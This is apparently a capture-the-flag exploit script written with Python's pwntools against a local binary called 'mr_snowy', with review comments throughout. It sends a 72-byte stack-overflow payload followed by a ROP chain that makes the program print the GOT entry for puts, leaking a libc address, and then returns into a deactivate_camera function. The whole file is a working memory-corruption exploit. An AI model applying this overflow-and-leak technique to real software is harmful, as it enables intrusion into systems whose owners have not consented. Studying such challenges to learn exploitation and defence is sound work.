#!/bin/env python
from pwn import *
# The target is a 64-bit binary; pwntools needs the arch for packing/ROP helpers.
context.update(arch='amd64')

# Distance from the start of the overflowed buffer to the saved return
# address (0x48 bytes). Presumably measured with a cyclic pattern beforehand;
# nothing in this file derives it.
offset = 72

# Load the challenge binary and start it locally as a pwntools tube.
# NOTE(review): the chain below only makes sense if the binary is non-PIE
# (fixed symbol/GOT addresses) and the overflow is not caught by a stack
# canary — confirm with checksec rather than assuming.
elf = ELF('./mr_snowy')
p = elf.process()
# navigate to the affected read()
def do_read():
    """Drain output from the target until the menu prompt ('>') shows up.

    Reads chunk by chunk from the global tube ``p`` and discards everything
    until a chunk containing ``b'>'`` arrives, so the next ``sendline`` is
    consumed by the input the program is actually waiting for.

    NOTE(review): there is no timeout here — a hung target hangs this loop.
    If the target exits, ``p.read()`` is expected to raise rather than
    return an empty chunk forever; verify against the tube implementation.
    """
    while b'>' not in p.read():
        pass
# Build the ROP chain from gadgets found in the binary itself.
rop = ROP(elf)

# puts(elf.got['puts']): the program prints the pointer stored in its own GOT
# slot for puts, i.e. the runtime libc address once the symbol is resolved.
# This script only causes the leak; it never reads the value back.
# (RELRO does not prevent *reading* the GOT; only PIE/ASLR would move these
# addresses — hence the non-PIE assumption noted at the top of the file.)
puts_addr = elf.symbols['puts']
puts_got = elf.got['puts']
rop.call(puts_addr, [puts_got])

# Return into deactivate_camera afterwards — presumably so execution lands
# back on a valid path instead of crashing after the leak; confirm against
# the binary's control flow.
rop.call(elf.symbols['deactivate_camera'])
# assemble payload: `offset` bytes of filler to reach the saved return
# address, immediately followed by the serialized ROP chain. The filler
# value (0xAA) is arbitrary and only chosen to be recognisable in a debugger.
payload = [
    bytes([0xAA]) * offset,
    rop.chain(),
]
# skip menu: wait for the first prompt, pick option 1, wait for the next one.
# NOTE(review): the menu option is hard-coded; if the program's menu changes,
# the payload is sent to the wrong read().
do_read()
p.sendline(b"1")
do_read()

# send payload: filler + ROP chain as a single line into the vulnerable read()
p.sendline(b"".join(payload))

# Hand the tube to the operator. Whatever puts prints (the leaked GOT value)
# appears here as raw bytes; the script does not parse it.
p.interactive()